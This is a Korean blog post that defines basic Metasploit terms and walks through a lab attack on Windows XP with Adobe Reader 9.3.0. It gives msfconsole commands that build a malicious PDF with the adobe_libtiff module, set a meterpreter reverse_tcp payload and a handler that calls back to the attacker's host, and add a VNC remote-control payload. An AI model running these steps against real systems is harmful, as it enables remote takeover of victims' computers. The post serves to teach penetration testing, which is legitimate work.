Simple is IT, 누구나 보고 누구나 깨닫는 IT

Metasploit Framework(메타스플로잇 프레임워크, reverse_shell) 본문

Simple is IT/Security

Metasploit Framework(메타스플로잇 프레임워크, reverse_shell)

currenjin 2020. 4. 27. 11:18

Metasploit Framework

: Rapid 7에서 취약점에 대한 정리와 해당 취약점을 이용해서 공격 테스트를 할 수 있는 각종 도구들을 제공

-> 오픈소스로써 보안 취약점 및 침투 테스트 등에 대한 정보를 제공하는 것이 목적

exploit : 시스템이나 어플리케이션, 서비스 등의 취약점을 이용하여 공격하는 공격 행위, 또는 명령어

Shell Code : 공격이 수행될 때 페이로드로 사용되어지는 코드, 어셈블리어(기계어)로 만들어진다.

Payload : 타깃 PC에게 전달하는 정보, 쉘 코드나 다른 추가적인 정보를 담고 있다.

Module : 메타스플로잇에서 사용되는 작은 프로그램들, 특정 기능들 ex) reverse_shell

Listener : 메타스플로잇에서 사용되는 공격 중 원격 연결을 수행할 때 서버의 역할을 하는 시스템

정리문서 : https://www.rapid7.com/db

ex) msfconsole을 이용해 사용

# msfconsole

metasploit


Hacker

192.168.0.161/24 (Kali Linux)

Target

192.168.0.152/24 (Windows XP)

PDF 문서 기반 공격 - Adobe Reader 9.3.0 취약점 이용

Hacker

악성파일 생성

# use exploit/windows/fileformat/adobe_libtiff

# set payload windows/meterpreter/reverse_tcp

# set LHOST [Hacker_IP]

# show options

# exploit

서버 LISTEN

# use exploit/multi/handler

# set LHOST [Hacker_IP]

# exploit

Target

! Adobe Reader 9.3.0 설치되어 있어야 한다.

파일이 Target에 무슨 방법을 써서든 옮겨졌다고 보자.

실행을 하고 Hacker의 화면을 보게되었을 때

연결이 수립된 것을 확인할 수 있다.

screenshot 명령

!!! 만약 원격 모듈을 추가하고싶다면 아래 내용 추가

# set payload windows/vncinject/reverse_tcp

# set VNCPORT [PORT]

# set ViewOnly false

# exploit


Comments